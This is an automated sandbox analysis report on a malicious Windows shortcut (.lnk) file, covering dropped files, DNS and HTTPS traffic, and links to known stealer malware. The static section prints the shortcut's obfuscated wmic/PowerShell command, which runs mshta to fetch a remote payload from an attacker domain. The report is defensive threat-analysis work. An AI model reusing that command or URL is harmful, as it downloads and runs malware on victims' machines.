                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:K9esyY0r4G.lnk
                                        renamed because original name is a hash value
                                        Original Sample Name:ed0e0fc1ef780ad73eb559719a3621e1.lnk
                                        Detection:MAL
                                        Classification:mal88.evad.winLNK@9/12@1/2
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 5
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .lnk

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 13.107.246.63
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target mshta.exe, PID 7944 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        03:03:39API Interceptor1x Sleep call for process: WMIC.exe modified
                                        03:03:46API Interceptor2x Sleep call for process: svchost.exe modified
                                        03:03:46API Interceptor1x Sleep call for process: mshta.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSonaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.11.101
                                        CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.165.185
                                        fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.165.185
                                        AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.165.185
                                        wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.165.185
                                        cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.165.185
                                        ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.11.101
                                        8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                        • 104.21.11.101
                                        ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.11.101
                                        DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                        • 104.21.11.101

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37f463bf4616ecd445d4a1937da06e19vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                        • 104.21.67.124
                                        aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        installer.batGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        skript.batGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        din.exeGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        yoda.exeGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        lem.exeGet hashmaliciousVidarBrowse
                                        • 104.21.67.124
                                        markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                        • 104.21.67.124
                                        utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                        • 104.21.67.124
                                        script.ps1Get hashmaliciousVidarBrowse
                                        • 104.21.67.124

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):1.3073446578123196
                                        Encrypted:false
                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvru:KooCEYhgYEL0In
                                        MD5:7D23C15E7DA425E11D247CE5927C6D03
                                        SHA1:9B3960754948D59AF0F536265B06C2CE969255C6
                                        SHA-256:B840B98414494DE29B85083BD8706B288B1F15B4C3F1B726388CE1DD3B49525D
                                        SHA-512:FCC698FDF8661E14F70C7CCB15036ADFB3589D800185ED2845370A4A0625F3114714F36FADE972C73673841F14E71E03D24D407157418FD02C10DA3D818F42F8
                                        Malicious:false
                                        Reputation:low
                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcf94166d, page size 16384, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.42207924562964805
                                        Encrypted:false
                                        SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                        MD5:E382A0D1A2FBE15C46A7A1E4CD0F14C2
                                        SHA1:C35140E526EEDAB766D316411FEFD7A5595D601B
                                        SHA-256:A925123C00AF1E190554BDCA4F168374E81C7E45E64E07C1349B0A67EA0B8203
                                        SHA-512:33C2356248CEDE5FA59D6113B32532674A1CC3DCB466596FED4F9D9BD01B57EB375C16FE78267E43F2D467403F821F3E160A72DB2660EC0597CAEDF80472E7FD
                                        Malicious:false
                                        Reputation:low
                                        Preview:..m... .......A.......X\...;...{......................0.!..........{A./....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................Q../....|-.................0.../....|-..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07413805066341175
                                        Encrypted:false
                                        SSDEEP:3:G3mll/lKYe9jZIl+luhajn13a/yt+3IlllllAllcVO/lnlZMxZNQl:ZltKz9lIllha53qyt+3Illl/AOewk
                                        MD5:BEFE8D1549E1A23D3D5EE58361D36D00
                                        SHA1:A1CC281EE928EE209C867DB3145356EAAE549D11
                                        SHA-256:6D6FC9A02205549AA323A9E2A892B36A4E67848B2AC0C399AD1B661AA8776EFC
                                        SHA-512:FDE678E563D480DDAE6DC8E977C9EEDBB1ED9B5B5D2B8448A0C8127A4EF39D3C65A992CFB25C5DBAB9AE0638A2E506C5F213033FF997C26485D6942D25A260CD
                                        Malicious:false
                                        Preview:.C.......................................;...{../....|-......{A..............{A......{A..........{A]................0.../....|-.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cf.errors[1].css

                                        Download File
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines (24050)
                                        Category:dropped
                                        Size (bytes):24051
                                        Entropy (8bit):4.941039417164537
                                        Encrypted:false
                                        SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                        MD5:5E8C69A459A691B5D1B9BE442332C87D
                                        SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                        SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                        SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                        Malicious:false
                                        Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\icon-exclamation[1].png

                                        Download File
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):452
                                        Entropy (8bit):7.0936408308765495
                                        Encrypted:false
                                        SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                        MD5:C33DE66281E933259772399D10A6AFE8
                                        SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                        SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                        SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                        Malicious:false
                                        Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.773832331134527
                                        Encrypted:false
                                        SSDEEP:3:Nlllulet:NllUe
                                        MD5:C3BD7F493D570718B5F1870D88DF5D3B
                                        SHA1:A4A0D7CFF3C663AB0144144C578C243926600E5C
                                        SHA-256:96DDC3E55B17140BE259812B00E7B566DC3B8F4E3ECB983EE0DE668D1969600F
                                        SHA-512:AD44555CBEBB536B32891DF4A03319728FFFF042ECCA33E6B97A0D2C0BF70D6961F2C1C7105D28F17D7536BEE8D45FBEE718D9B499DA9B2C53AC1F77F81B14CC
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1moncazx.1vx.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2iq1xa2s.4wp.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cch20dah.4yx.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctsoiwi.yqy.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.306461250274409
                                        Encrypted:false
                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                        Malicious:false
                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                        \Device\ConDrv

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):160
                                        Entropy (8bit):5.108203110114614
                                        Encrypted:false
                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglTb0qJQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/egZdeAin
                                        MD5:7F3AFEB99B0BAB41FB8ED0374686F10B
                                        SHA1:B68761E8687430915A6DB9156EF7C832BAC6BE5B
                                        SHA-256:F5D04A7463A9A35388AD2EC0B9E12075DFADB2F089E9FE6B84BAD6DA551F03EE
                                        SHA-512:5028B6964FF51DDD40781C784E08D3200DB999D53A99276A91111A5C09D050C02858AABBEEC6A36A7AA85E9BEFF8CD088B1B5669D07AAD81468FB9967D7AD9C5
                                        Malicious:false
                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7684;...ReturnValue = 0;..};....

                                        Static File Info

                                        General

                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                        Entropy (8bit):1.0537404993285517
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:K9esyY0r4G.lnk
                                        File size:5'836 bytes
                                        MD5:ed0e0fc1ef780ad73eb559719a3621e1
                                        SHA1:a739f5a4cb67f3b8ea5b4b5d08e35c4a60f8bd8c
                                        SHA256:6c8573069dadedd4fb861b3de01f94a87024f872fdd51652ad8959443851b333
                                        SHA512:e098ad7a3de3134c0d38562a6bd5a829551fd7e5a8b7b6ba2c855ba9d5cdc41672f83ced949f9018e27a072bc07ab4072a97c968bbd5d005db093df64eceaf8b
                                        SSDEEP:24:8lH/BUlgKN4ed+/31kWNdk6Zocdlg9qdd79dsrabxJlpl9l:8BuGeq1ldkUXddJ9AadrL9
                                        TLSH:FAC13B042AF90B20F3B39F72547677148A7F7C5BEE738E1D008195881527A11E839FAB
                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                        File Icon

                                        Icon Hash:929e9e96a3f3d6ed

                                        Static Windows Shortcut Info

                                        General

                                        Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 27, 2024 09:03:43.318713903 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:43.318756104 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:43.318815947 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:43.328902960 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:43.328922987 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:44.592019081 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:44.592098951 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:44.938771963 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:44.938788891 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:44.939112902 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:44.939171076 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:44.943439960 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:44.987369061 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270714998 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270765066 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270783901 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.270791054 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270819902 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270831108 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.270878077 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.270884037 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270906925 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.270925045 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.270953894 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.273796082 CET49730443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.273806095 CET44349730104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.279927969 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.279989004 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:45.280069113 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.280489922 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:45.280508995 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:46.583332062 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:46.583633900 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:46.584505081 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:46.584520102 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:46.584739923 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:46.584750891 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.037885904 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.037940979 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.037962914 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.037967920 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.038009882 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.038031101 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.038031101 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.038054943 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.038058996 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.038100958 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.046061993 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.046134949 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.046171904 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.046221018 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.054483891 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.054672003 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.054708958 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.054785013 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.062937975 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.063011885 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.063055038 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.063102007 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.157423019 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.157577038 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.161489964 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.161618948 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.248104095 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.248347998 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.251877069 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.251979113 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.252006054 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.252055883 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.259793997 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.259864092 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.262727022 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.262810946 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.262851954 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.262904882 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.262917995 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.262936115 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.262962103 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.262970924 CET44349731104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.263008118 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.263008118 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.263008118 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.263032913 CET49731443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.340293884 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.340354919 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:47.340481043 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.340687990 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:47.340703011 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:48.597240925 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:48.597368002 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:48.597821951 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:48.597835064 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:48.598030090 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:48.598037004 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:49.090269089 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:49.090332985 CET44349732104.21.67.124192.168.2.4
                                        Dec 27, 2024 09:03:49.090369940 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:49.090389013 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:49.091542959 CET49732443192.168.2.4104.21.67.124
                                        Dec 27, 2024 09:03:49.091559887 CET44349732104.21.67.124192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 27, 2024 09:03:42.879884958 CET6019053192.168.2.41.1.1.1
                                        Dec 27, 2024 09:03:43.311978102 CET53601901.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 27, 2024 09:03:42.879884958 CET192.168.2.41.1.1.10x79bdStandard query (0)nextgencoding.cyouA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 27, 2024 09:03:43.311978102 CET1.1.1.1192.168.2.40x79bdNo error (0)nextgencoding.cyou104.21.67.124A (IP address)IN (0x0001)false
                                        Dec 27, 2024 09:03:43.311978102 CET1.1.1.1192.168.2.40x79bdNo error (0)nextgencoding.cyou172.67.174.198A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • nextgencoding.cyou
                                        • https:

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730104.21.67.1244437944C:\Windows\System32\mshta.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-27 08:03:44 UTC332OUTGET /asd/amber3 HTTP/1.1
                                        Accept: */*
